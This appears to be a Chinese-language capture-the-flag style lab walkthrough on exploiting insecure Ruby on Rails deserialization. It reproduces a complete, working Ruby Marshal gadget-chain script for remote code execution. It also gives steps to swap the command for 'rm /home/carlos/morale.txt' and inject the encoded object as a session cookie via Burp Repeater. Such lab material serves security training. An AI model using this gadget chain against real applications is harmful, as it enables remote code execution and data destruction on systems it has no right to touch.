靶场内容：

本实验使用基于序列化的会话机制和 Ruby on Rails 框架。有一个记录的漏洞利用可以通过此框架中的小工具链实现远程代码执行。

要解决实验室问题，请查找记录的漏洞利用并对其进行调整以创建包含远程代码执行有效负载的恶意序列化对象。然后，将此对象传递到网站以morale.txt从 Carlos 的主目录中删除该文件。

解决方法：

• 登录到您自己的帐户并注意会话 cookie 包含一个序列化（"marshaled"）Ruby 对象。将包含此会话 cookie 的请求发送到 Burp Repeater。
• 浏览网络以找到 Luke Jahnke 的“Ruby 2.x Universal RCE Gadget Chain”

#!/usr/bin/env ruby

class Gem::StubSpecification
  def initialize; end
end


stub_specification = Gem::StubSpecification.new
stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")

puts "STEP n"
stub_specification.name rescue nil
puts


class Gem::Source::SpecificFile
  def initialize; end
end

specific_file = Gem::Source::SpecificFile.new
specific_file.instance_variable_set(:@spec, stub_specification)

other_specific_file = Gem::Source::SpecificFile.new

puts "STEP n-1"
specific_file <=> other_specific_file rescue nil
puts


$dependency_list= Gem::DependencyList.new
$dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file])

puts "STEP n-2"
$dependency_list.each{} rescue nil
puts


class Gem::Requirement
  def marshal_dump
    [$dependency_list]
  end
end

payload = Marshal.dump(Gem::Requirement.new)

puts "STEP n-3"
Marshal.load(payload) rescue nil
puts


puts "VALIDATION (in fresh ruby process):"
IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe|
  pipe.print payload
  pipe.close_write
  puts pipe.gets
  puts
end

puts "Payload (hex):"
puts payload.unpack('H*')[0]
puts


require "base64"
puts "Payload (Base64 encoded):"
puts Base64.encode64(payload)

• 复制用于生成有效负载的脚本，并将应执行的命令(在stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")中的id)从id更改为rm /home/carlos/morale.txt并运行脚本。这将生成一个包含有效负载的序列化对象。输出包含对象的十六进制和 Base64 编码版本。
  
• 复制 Base64 编码的对象。
• 对对象进行 URL 编码，然后在 Burp Repeater 中，将您的会话 cookie 替换为您刚刚创建的恶意 cookie。
  
• 发送解决实验室的请求。